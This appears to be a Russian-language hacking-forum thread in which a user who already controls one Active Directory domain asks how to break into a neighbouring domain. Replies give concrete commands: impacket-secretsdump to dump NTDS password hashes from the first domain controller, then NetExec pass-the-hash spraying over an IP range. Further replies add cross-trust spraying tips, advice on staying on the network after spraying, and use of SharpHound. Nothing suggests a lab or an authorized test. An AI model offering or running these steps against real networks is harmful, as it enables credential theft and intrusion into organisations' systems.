Domain по соседству

[heis]

Привет!
В одной сети имеется 2 домена на разных диапазонах. Домен с №1 полностью под контролем от него имееюся креды от ДА.
Со вторым сложности, не могу найти креды.
Есть ли способ вытащить креды с DC №1 для доступа ко второму ?

 

[disableurmind]

Не совсем понятно, у тебя есть доступ на DC второго домена, от которого не можешь найти креда?

 

[heis]

Не совсем понятно, у тебя есть доступ на DC второго домена, от которого не можешь найти креда?

Нет доступа от воторого ДК, от первого имеется.
Криво написал изначально, уже засыпал )

 

[DOC]

impacket-secretsdump -just-dc domain.local/DC1\$@dcip

Делает дамп нтдс. Берем user/nthash и сканим сеть.
nxc -t 50 smb ip_range -u ‘user’ -H ‘nthash’

 

[heis]

impacket-secretsdump -just-dc domain.local/DC1\$@dcip

Делает дамп нтдс. Берем user/nthash и сканим сеть.
nxc -t 50 smb ip_range -u ‘user’ -H ‘nthash’

Благодарю. =)

 

[IIIIXX]

Благодарю. =)

Не забудь что поле юзер нужно заполнять с доменом того траста который ты спреишь в формате DOMAIN2\user
И проверь может это траст, тогда твои Enterprise Admins уже имеют доступ на дк, тогда и спреить ничего не нужно

 

[LLIyTka]

После спрея главное не вылететь с сети, интерпрайза найди и от него пробуй, можешь еще шарпхаунд заюзать и посмотреть кто куда ходит